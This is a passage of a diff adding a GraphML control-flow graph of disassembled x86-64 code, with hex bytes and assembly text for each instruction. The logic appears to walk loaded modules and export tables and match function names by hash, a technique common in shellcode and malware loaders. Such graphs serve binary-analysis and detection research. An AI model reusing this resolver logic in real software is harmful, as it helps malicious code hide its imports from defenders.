+        <edge source="block.0x1139:instruction.0x113d" target="block.0x1139:instruction.0x1141"/>
+        <edge source="block.0x1139:instruction.0x1141" target="block.0x1139:instruction.0x114d"/>
+        <edge source="block.0x1139:instruction.0x1141" target="block.0x1139:instruction.0x1154"/>
+        <edge source="block.0x1139:instruction.0x1145" target="block.0x1139:instruction.0x1149"/>
+        <edge source="block.0x1139:instruction.0x1149" target="block.0x1139:instruction.0x114d"/>
+        <edge source="block.0x1139:instruction.0x114d" target="block.0x1139:instruction.0x1151"/>
+        <edge source="block.0x1139:instruction.0x1151" target="block.0x1139:instruction.0x1154"/>
+        <edge source="block.0x1139:instruction.0x1154" target="block.0x1139:instruction.0x115e"/>
+        <edge source="block.0x1139:instruction.0x1158" target="block.0x1139:instruction.0x115e"/>
+        <edge source="block.0x1139:instruction.0x115e" target="block.0x1139:instruction.0x1163"/>
+      </graph>
+    </node>
+    <node id="block.0x1165">
+      <data key="address">0x1165</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1165</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1165:instruction.0x1165">
+          <data key="address">0x1165</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c8975f8</data>
+          <data key="instruction.source">mov qword ptr [rbp - 8], r14</data>
+        </node>
+        <node id="block.0x1165:instruction.0x1169">
+          <data key="address">0x1169</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">eb04</data>
+          <data key="instruction.source">jmp 0x116f</data>
+        </node>
+        <edge source="block.0x1165:instruction.0x1165" target="block.0x1165:instruction.0x1169"/>
+      </graph>
+    </node>
+    <node id="block.0x116b">
+      <data key="address">0x116b</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x116b</data>
+        <data key="type">instructions</data>
+        <node id="block.0x116b:instruction.0x116b">
+          <data key="address">0x116b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c8975f0</data>
+          <data key="instruction.source">mov qword ptr [rbp - 0x10], r14</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x116f">
+      <data key="address">0x116f</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x116f</data>
+        <data key="type">instructions</data>
+        <node id="block.0x116f:instruction.0x116f">
+          <data key="address">0x116f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b8578ffffff</data>
+          <data key="instruction.source">mov rax, qword ptr [rbp - 0x88]</data>
+        </node>
+        <node id="block.0x116f:instruction.0x1176">
+          <data key="address">0x1176</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48ffc8</data>
+          <data key="instruction.source">dec rax</data>
+        </node>
+        <node id="block.0x116f:instruction.0x1179">
+          <data key="address">0x1179</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48898578ffffff</data>
+          <data key="instruction.source">mov qword ptr [rbp - 0x88], rax</data>
+        </node>
+        <node id="block.0x116f:instruction.0x1180">
+          <data key="address">0x1180</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4885c0</data>
+          <data key="instruction.source">test rax, rax</data>
+        </node>
+        <node id="block.0x116f:instruction.0x1183">
+          <data key="address">0x1183</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0f84d7000000</data>
+          <data key="instruction.source">je 0x1260</data>
+        </node>
+        <edge source="block.0x116f:instruction.0x116f" target="block.0x116f:instruction.0x1176"/>
+        <edge source="block.0x116f:instruction.0x1176" target="block.0x116f:instruction.0x1179"/>
+        <edge source="block.0x116f:instruction.0x1176" target="block.0x116f:instruction.0x1180"/>
+        <edge source="block.0x116f:instruction.0x1176" target="block.0x116f:instruction.0x1183"/>
+        <edge source="block.0x116f:instruction.0x1179" target="block.0x116f:instruction.0x1183"/>
+        <edge source="block.0x116f:instruction.0x1180" target="block.0x116f:instruction.0x1183"/>
+      </graph>
+    </node>
+    <node id="block.0x1189">
+      <data key="address">0x1189</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1189</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1189:instruction.0x1189">
+          <data key="address">0x1189</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488345b804</data>
+          <data key="instruction.source">add qword ptr [rbp - 0x48], 4</data>
+        </node>
+        <node id="block.0x1189:instruction.0x118e">
+          <data key="address">0x118e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488345b002</data>
+          <data key="instruction.source">add qword ptr [rbp - 0x50], 2</data>
+        </node>
+        <node id="block.0x1189:instruction.0x1193">
+          <data key="address">0x1193</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">e967ffffff</data>
+          <data key="instruction.source">jmp 0x10ff</data>
+        </node>
+        <edge source="block.0x1189:instruction.0x1189" target="block.0x1189:instruction.0x118e"/>
+        <edge source="block.0x1189:instruction.0x118e" target="block.0x1189:instruction.0x1193"/>
+      </graph>
+    </node>
+    <node id="block.0x1198">
+      <data key="address">0x1198</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1198</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1198:instruction.0x1198">
+          <data key="address">0x1198</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b45a0</data>
+          <data key="instruction.source">mov rax, qword ptr [rbp - 0x60]</data>
+        </node>
+        <node id="block.0x1198:instruction.0x119c">
+          <data key="address">0x119c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c8b6820</data>
+          <data key="instruction.source">mov r13, qword ptr [rax + 0x20]</data>
+        </node>
+        <node id="block.0x1198:instruction.0x11a0">
+          <data key="address">0x11a0</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c896dd0</data>
+          <data key="instruction.source">mov qword ptr [rbp - 0x30], r13</data>
+        </node>
+        <node id="block.0x1198:instruction.0x11a4">
+          <data key="address">0x11a4</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">e8e9030000</data>
+          <data key="instruction.source">call 0x1592</data>
+        </node>
+        <edge source="block.0x1198:instruction.0x1198" target="block.0x1198:instruction.0x119c"/>
+        <edge source="block.0x1198:instruction.0x119c" target="block.0x1198:instruction.0x11a0"/>
+        <edge source="block.0x1198:instruction.0x11a0" target="block.0x1198:instruction.0x11a4"/>
+      </graph>
+    </node>
+    <node id="block.0x11a9">
+      <data key="address">0x11a9</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x11a9</data>
+        <data key="type">instructions</data>
+        <node id="block.0x11a9:instruction.0x11a9">
+          <data key="address">0x11a9</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48c78578ffffff03000000</data>
+          <data key="instruction.source">mov qword ptr [rbp - 0x88], 3</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x11b4">
+      <data key="address">0x11b4</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x11b4</data>
+        <data key="type">instructions</data>
+        <node id="block.0x11b4:instruction.0x11b4">
+          <data key="address">0x11b4</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b4590</data>
+          <data key="instruction.source">mov rax, qword ptr [rbp - 0x70]</data>
+        </node>
+        <node id="block.0x11b4:instruction.0x11b8">
+          <data key="address">0x11b8</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4885c0</data>
+          <data key="instruction.source">test rax, rax</data>
+        </node>
+        <node id="block.0x11b4:instruction.0x11bb">
+          <data key="address">0x11bb</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0f849f000000</data>
+          <data key="instruction.source">je 0x1260</data>
+        </node>
+        <edge source="block.0x11b4:instruction.0x11b4" target="block.0x11b4:instruction.0x11b8"/>
+        <edge source="block.0x11b4:instruction.0x11b8" target="block.0x11b4:instruction.0x11bb"/>
+      </graph>
+    </node>
+    <node id="block.0x11c1">
+      <data key="address">0x11c1</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x11c1</data>
+        <data key="type">instructions</data>
+        <node id="block.0x11c1:instruction.0x11c1">
+          <data key="address">0x11c1</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48ffc8</data>
+          <data key="instruction.source">dec rax</data>
+        </node>
+        <node id="block.0x11c1:instruction.0x11c4">
+          <data key="address">0x11c4</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48894590</data>
+          <data key="instruction.source">mov qword ptr [rbp - 0x70], rax</data>
+        </node>
+        <node id="block.0x11c1:instruction.0x11c8">
+          <data key="address">0x11c8</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b4db8</data>
+          <data key="instruction.source">mov rcx, qword ptr [rbp - 0x48]</data>
+        </node>
+        <node id="block.0x11c1:instruction.0x11cc">
+          <data key="address">0x11cc</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b09</data>
+          <data key="instruction.source">mov ecx, dword ptr [rcx]</data>
+        </node>
+        <node id="block.0x11c1:instruction.0x11ce">
+          <data key="address">0x11ce</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48034dd0</data>
+          <data key="instruction.source">add rcx, qword ptr [rbp - 0x30]</data>
+        </node>
+        <node id="block.0x11c1:instruction.0x11d2">
+          <data key="address">0x11d2</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">e8f3030000</data>
+          <data key="instruction.source">call 0x15ca</data>
+        </node>
+        <edge source="block.0x11c1:instruction.0x11c1" target="block.0x11c1:instruction.0x11c4"/>
+        <edge source="block.0x11c1:instruction.0x11c1" target="block.0x11c1:instruction.0x11ce"/>
+        <edge source="block.0x11c1:instruction.0x11c4" target="block.0x11c1:instruction.0x11d2"/>
+        <edge source="block.0x11c1:instruction.0x11c8" target="block.0x11c1:instruction.0x11cc"/>
+        <edge source="block.0x11c1:instruction.0x11cc" target="block.0x11c1:instruction.0x11ce"/>
+        <edge source="block.0x11c1:instruction.0x11ce" target="block.0x11c1:instruction.0x11d2"/>
+      </graph>
+    </node>
+    <node id="block.0x11d7">
+      <data key="address">0x11d7</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x11d7</data>
+        <data key="type">instructions</data>
+        <node id="block.0x11d7:instruction.0x11d7">
+          <data key="address">0x11d7</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48898570ffffff</data>
+          <data key="instruction.source">mov qword ptr [rbp - 0x90], rax</data>
+        </node>
+        <node id="block.0x11d7:instruction.0x11de">
+          <data key="address">0x11de</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">3db80a4c53</data>
+          <data key="instruction.source">cmp eax, 0x534c0ab8</data>
+        </node>
+        <node id="block.0x11d7:instruction.0x11e3">
+          <data key="address">0x11e3</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7410</data>
+          <data key="instruction.source">je 0x11f5</data>
+        </node>
+        <edge source="block.0x11d7:instruction.0x11d7" target="block.0x11d7:instruction.0x11e3"/>
+        <edge source="block.0x11d7:instruction.0x11de" target="block.0x11d7:instruction.0x11e3"/>
+      </graph>
+    </node>
+    <node id="block.0x11e5">
+      <data key="address">0x11e5</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x11e5</data>
+        <data key="type">instructions</data>
+        <node id="block.0x11e5:instruction.0x11e5">
+          <data key="address">0x11e5</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">3ded4a3dd3</data>
+          <data key="instruction.source">cmp eax, 0xd33d4aed</data>
+        </node>
+        <node id="block.0x11e5:instruction.0x11ea">
+          <data key="address">0x11ea</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7409</data>
+          <data key="instruction.source">je 0x11f5</data>
+        </node>
+        <edge source="block.0x11e5:instruction.0x11e5" target="block.0x11e5:instruction.0x11ea"/>
+      </graph>
+    </node>
+    <node id="block.0x11ec">
+      <data key="address">0x11ec</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x11ec</data>
+        <data key="type">instructions</data>
+        <node id="block.0x11ec:instruction.0x11ec">
+          <data key="address">0x11ec</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">3d894d3fbc</data>
+          <data key="instruction.source">cmp eax, 0xbc3f4d89</data>
+        </node>
+        <node id="block.0x11ec:instruction.0x11f1">
+          <data key="address">0x11f1</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7402</data>
+          <data key="instruction.source">je 0x11f5</data>
+        </node>
+        <edge source="block.0x11ec:instruction.0x11ec" target="block.0x11ec:instruction.0x11f1"/>
+      </graph>
+    </node>
+    <node id="block.0x11f3">
+      <data key="address">0x11f3</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x11f3</data>
+        <data key="type">instructions</data>
+        <node id="block.0x11f3:instruction.0x11f3">
+          <data key="address">0x11f3</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">eb5c</data>
+          <data key="instruction.source">jmp 0x1251</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x11f5">
+      <data key="address">0x11f5</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x11f5</data>
+        <data key="type">instructions</data>
+        <node id="block.0x11f5:instruction.0x11f5">
+          <data key="address">0x11f5</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c8b75c0</data>
+          <data key="instruction.source">mov r14, qword ptr [rbp - 0x40]</data>
+        </node>
+        <node id="block.0x11f5:instruction.0x11f9">
+          <data key="address">0x11f9</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">458b761c</data>
+          <data key="instruction.source">mov r14d, dword ptr [r14 + 0x1c]</data>
+        </node>
+        <node id="block.0x11f5:instruction.0x11fd">
+          <data key="address">0x11fd</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c0375d0</data>
+          <data key="instruction.source">add r14, qword ptr [rbp - 0x30]</data>
+        </node>
+        <node id="block.0x11f5:instruction.0x1201">
+          <data key="address">0x1201</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c8b7db0</data>
+          <data key="instruction.source">mov r15, qword ptr [rbp - 0x50]</data>
+        </node>
+        <node id="block.0x11f5:instruction.0x1205">
+          <data key="address">0x1205</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">450fb73f</data>
+          <data key="instruction.source">movzx r15d, word ptr [r15]</data>
+        </node>
+        <node id="block.0x11f5:instruction.0x1209">
+          <data key="address">0x1209</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4f8d34be</data>
+          <data key="instruction.source">lea r14, [r14 + r15*4]</data>
+        </node>
+        <node id="block.0x11f5:instruction.0x120d">
+          <data key="address">0x120d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">458b36</data>
+          <data key="instruction.source">mov r14d, dword ptr [r14]</data>
+        </node>
+        <node id="block.0x11f5:instruction.0x1210">
+          <data key="address">0x1210</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c0375d0</data>
+          <data key="instruction.source">add r14, qword ptr [rbp - 0x30]</data>
+        </node>
+        <node id="block.0x11f5:instruction.0x1214">
+          <data key="address">0x1214</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b8570ffffff</data>
+          <data key="instruction.source">mov eax, dword ptr [rbp - 0x90]</data>
+        </node>
+        <node id="block.0x11f5:instruction.0x121a">
+          <data key="address">0x121a</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">3db80a4c53</data>
+          <data key="instruction.source">cmp eax, 0x534c0ab8</data>
+        </node>
+        <node id="block.0x11f5:instruction.0x121f">
+          <data key="address">0x121f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7506</data>
+          <data key="instruction.source">jne 0x1227</data>
+        </node>
+        <edge source="block.0x11f5:instruction.0x11f5" target="block.0x11f5:instruction.0x11f9"/>
+        <edge source="block.0x11f5:instruction.0x11f9" target="block.0x11f5:instruction.0x11fd"/>
+        <edge source="block.0x11f5:instruction.0x11fd" target="block.0x11f5:instruction.0x1209"/>
+        <edge source="block.0x11f5:instruction.0x11fd" target="block.0x11f5:instruction.0x1210"/>
+        <edge source="block.0x11f5:instruction.0x1201" target="block.0x11f5:instruction.0x1205"/>
+        <edge source="block.0x11f5:instruction.0x1205" target="block.0x11f5:instruction.0x1209"/>
+        <edge source="block.0x11f5:instruction.0x1209" target="block.0x11f5:instruction.0x120d"/>
+        <edge source="block.0x11f5:instruction.0x120d" target="block.0x11f5:instruction.0x1210"/>
+        <edge source="block.0x11f5:instruction.0x1210" target="block.0x11f5:instruction.0x121a"/>
+        <edge source="block.0x11f5:instruction.0x1214" target="block.0x11f5:instruction.0x121a"/>
+        <edge source="block.0x11f5:instruction.0x121a" target="block.0x11f5:instruction.0x121f"/>
+      </graph>
+    </node>
+    <node id="block.0x1221">
+      <data key="address">0x1221</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1221</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1221:instruction.0x1221">
+          <data key="address">0x1221</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c8975e0</data>
+          <data key="instruction.source">mov qword ptr [rbp - 0x20], r14</data>
+        </node>
+        <node id="block.0x1221:instruction.0x1225">
+          <data key="address">0x1225</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">eb14</data>
+          <data key="instruction.source">jmp 0x123b</data>
+        </node>
+        <edge source="block.0x1221:instruction.0x1221" target="block.0x1221:instruction.0x1225"/>
+      </graph>
+    </node>
+    <node id="block.0x1227">
+      <data key="address">0x1227</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1227</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1227:instruction.0x1227">
+          <data key="address">0x1227</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">3ded4a3dd3</data>
+          <data key="instruction.source">cmp eax, 0xd33d4aed</data>
+        </node>
+        <node id="block.0x1227:instruction.0x122c">
+          <data key="address">0x122c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7506</data>
+          <data key="instruction.source">jne 0x1234</data>
+        </node>
+        <edge source="block.0x1227:instruction.0x1227" target="block.0x1227:instruction.0x122c"/>
+      </graph>
+    </node>
+    <node id="block.0x122e">
+      <data key="address">0x122e</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x122e</data>
+        <data key="type">instructions</data>
+        <node id="block.0x122e:instruction.0x122e">
+          <data key="address">0x122e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c8975e8</data>
+          <data key="instruction.source">mov qword ptr [rbp - 0x18], r14</data>
+        </node>
+        <node id="block.0x122e:instruction.0x1232">
+          <data key="address">0x1232</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">eb07</data>
+          <data key="instruction.source">jmp 0x123b</data>
+        </node>
+        <edge source="block.0x122e:instruction.0x122e" target="block.0x122e:instruction.0x1232"/>
+      </graph>
+    </node>
+    <node id="block.0x1234">
+      <data key="address">0x1234</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1234</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1234:instruction.0x1234">
+          <data key="address">0x1234</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c89b568ffffff</data>
+          <data key="instruction.source">mov qword ptr [rbp - 0x98], r14</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x123b">
+      <data key="address">0x123b</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x123b</data>
+        <data key="type">instructions</data>
+        <node id="block.0x123b:instruction.0x123b">
+          <data key="address">0x123b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b8578ffffff</data>
+          <data key="instruction.source">mov rax, qword ptr [rbp - 0x88]</data>
+        </node>
+        <node id="block.0x123b:instruction.0x1242">
+          <data key="address">0x1242</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48ffc8</data>
+          <data key="instruction.source">dec rax</data>
+        </node>
+        <node id="block.0x123b:instruction.0x1245">
+          <data key="address">0x1245</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">48898578ffffff</data>
+          <data key="instruction.source">mov qword ptr [rbp - 0x88], rax</data>
+        </node>
+        <node id="block.0x123b:instruction.0x124c">
+          <data key="address">0x124c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4885c0</data>
+          <data key="instruction.source">test rax, rax</data>
+        </node>
+        <node id="block.0x123b:instruction.0x124f">
+          <data key="address">0x124f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">740f</data>
+          <data key="instruction.source">je 0x1260</data>
+        </node>
+        <edge source="block.0x123b:instruction.0x123b" target="block.0x123b:instruction.0x1242"/>
+        <edge source="block.0x123b:instruction.0x1242" target="block.0x123b:instruction.0x1245"/>
+        <edge source="block.0x123b:instruction.0x1242" target="block.0x123b:instruction.0x124c"/>
+        <edge source="block.0x123b:instruction.0x1242" target="block.0x123b:instruction.0x124f"/>
+        <edge source="block.0x123b:instruction.0x1245" target="block.0x123b:instruction.0x124f"/>
+        <edge source="block.0x123b:instruction.0x124c" target="block.0x123b:instruction.0x124f"/>
+      </graph>
+    </node>
+    <node id="block.0x1251">
+      <data key="address">0x1251</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1251</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1251:instruction.0x1251">
+          <data key="address">0x1251</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488345b804</data>
+          <data key="instruction.source">add qword ptr [rbp - 0x48], 4</data>
+        </node>
+        <node id="block.0x1251:instruction.0x1256">
+          <data key="address">0x1256</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488345b002</data>
+          <data key="instruction.source">add qword ptr [rbp - 0x50], 2</data>
+        </node>
+        <node id="block.0x1251:instruction.0x125b">
+          <data key="address">0x125b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">e954ffffff</data>
+          <data key="instruction.source">jmp 0x11b4</data>
+        </node>
+        <edge source="block.0x1251:instruction.0x1251" target="block.0x1251:instruction.0x1256"/>
+        <edge source="block.0x1251:instruction.0x1256" target="block.0x1251:instruction.0x125b"/>
+      </graph>
+    </node>
+    <node id="block.0x1260">
+      <data key="address">0x1260</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1260</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1260:instruction.0x1260">
+          <data key="address">0x1260</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b45f8</data>
+          <data key="instruction.source">mov rax, qword ptr [rbp - 8]</data>
+        </node>
+        <node id="block.0x1260:instruction.0x1264">
+          <data key="address">0x1264</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4885c0</data>
+          <data key="instruction.source">test rax, rax</data>
+        </node>
+        <node id="block.0x1260:instruction.0x1267">
+          <data key="address">0x1267</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7427</data>
+          <data key="instruction.source">je 0x1290</data>
+        </node>
+        <edge source="block.0x1260:instruction.0x1260" target="block.0x1260:instruction.0x1264"/>
+        <edge source="block.0x1260:instruction.0x1264" target="block.0x1260:instruction.0x1267"/>
+      </graph>
+    </node>
+    <node id="block.0x1269">
+      <data key="address">0x1269</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1269</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1269:instruction.0x1269">
+          <data key="address">0x1269</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b45f0</data>
+          <data key="instruction.source">mov rax, qword ptr [rbp - 0x10]</data>
+        </node>
+        <node id="block.0x1269:instruction.0x126d">
+          <data key="address">0x126d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4885c0</data>
+          <data key="instruction.source">test rax, rax</data>
+        </node>
+        <node id="block.0x1269:instruction.0x1270">
+          <data key="address">0x1270</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">741e</data>
+          <data key="instruction.source">je 0x1290</data>
+        </node>
+        <edge source="block.0x1269:instruction.0x1269" target="block.0x1269:instruction.0x126d"/>
+        <edge source="block.0x1269:instruction.0x126d" target="block.0x1269:instruction.0x1270"/>
+      </graph>
+    </node>
+    <node id="block.0x1272">
+      <data key="address">0x1272</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1272</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1272:instruction.0x1272">
+          <data key="address">0x1272</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b45e8</data>
+          <data key="instruction.source">mov rax, qword ptr [rbp - 0x18]</data>
+        </node>
+        <node id="block.0x1272:instruction.0x1276">
+          <data key="address">0x1276</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4885c0</data>
+          <data key="instruction.source">test rax, rax</data>
+        </node>
+        <node id="block.0x1272:instruction.0x1279">
+          <data key="address">0x1279</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7415</data>
+          <data key="instruction.source">je 0x1290</data>
+        </node>
+        <edge source="block.0x1272:instruction.0x1272" target="block.0x1272:instruction.0x1276"/>
+        <edge source="block.0x1272:instruction.0x1276" target="block.0x1272:instruction.0x1279"/>
+      </graph>
+    </node>
+    <node id="block.0x127b">
+      <data key="address">0x127b</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x127b</data>
+        <data key="type">instructions</data>
+        <node id="block.0x127b:instruction.0x127b">
+          <data key="address">0x127b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b8568ffffff</data>
+          <data key="instruction.source">mov rax, qword ptr [rbp - 0x98]</data>
+        </node>
+        <node id="block.0x127b:instruction.0x1282">
+          <data key="address">0x1282</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4885c0</data>
+          <data key="instruction.source">test rax, rax</data>
+        </node>
+        <node id="block.0x127b:instruction.0x1285">
+          <data key="address">0x1285</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7409</data>
+          <data key="instruction.source">je 0x1290</data>
+        </node>
+        <edge source="block.0x127b:instruction.0x127b" target="block.0x127b:instruction.0x1282"/>
+        <edge source="block.0x127b:instruction.0x1282" target="block.0x127b:instruction.0x1285"/>
+      </graph>
+    </node>
+    <node id="block.0x1287">
+      <data key="address">0x1287</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1287</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1287:instruction.0x1287">
+          <data key="address">0x1287</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b45e0</data>
+          <data key="instruction.source">mov rax, qword ptr [rbp - 0x20]</data>
+        </node>
+        <node id="block.0x1287:instruction.0x128b">
+          <data key="address">0x128b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4885c0</data>
+          <data key="instruction.source">test rax, rax</data>
+        </node>
+        <node id="block.0x1287:instruction.0x128e">
+          <data key="address">0x128e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">750c</data>
+          <data key="instruction.source">jne 0x129c</data>
+        </node>
+        <edge source="block.0x1287:instruction.0x1287" target="block.0x1287:instruction.0x128b"/>
+        <edge source="block.0x1287:instruction.0x128b" target="block.0x1287:instruction.0x128e"/>
+      </graph>
+    </node>
+    <node id="block.0x1290">
+      <data key="address">0x1290</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1290</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1290:instruction.0x1290">
+          <data key="address">0x1290</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b45a0</data>
+          <data key="instruction.source">mov rax, qword ptr [rbp - 0x60]</data>
+        </node>
+        <node id="block.0x1290:instruction.0x1294">
+          <data key="address">0x1294</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b00</data>
+          <data key="instruction.source">mov rax, qword ptr [rax]</data>
+        </node>
+        <node id="block.0x1290:instruction.0x1297">
+          <data key="address">0x1297</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">e9f0fdffff</data>
+          <data key="instruction.source">jmp 0x108c</data>
+        </node>
+        <edge source="block.0x1290:instruction.0x1290" target="block.0x1290:instruction.0x1294"/>
+        <edge source="block.0x1290:instruction.0x1294" target="block.0x1290:instruction.0x1297"/>
+      </graph>
+    </node>
+    <node id="block.0x129c">
+      <data key="address">0x129c</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x129c</data>
+        <data key="type">instructions</data>
+        <node id="block.0x129c:instruction.0x129c">
+          <data key="address">0x129c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">488b4dd8</data>
+          <data key="instruction.source">mov rcx, qword ptr [rbp - 0x28]</data>
+        </node>
+        <node id="block.0x129c:instruction.0x12a0">
+          <data key="address">0x12a0</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b413c</data>
+          <data key="instruction.source">mov eax, dword ptr [rcx + 0x3c]</data>
+        </node>
+        <node id="block.0x129c:instruction.0x12a3">
+          <data key="address">0x12a3</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c8d2401</data>
+          <data key="instruction.source">lea r12, [rcx + rax]</data>
+        </node>
+        <node id="block.0x129c:instruction.0x12a7">
+          <data key="address">0x12a7</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">4c8965c8</data>
+          <data key="instruction.source">mov qword ptr [rbp - 0x38], r12</data>
+        </node>
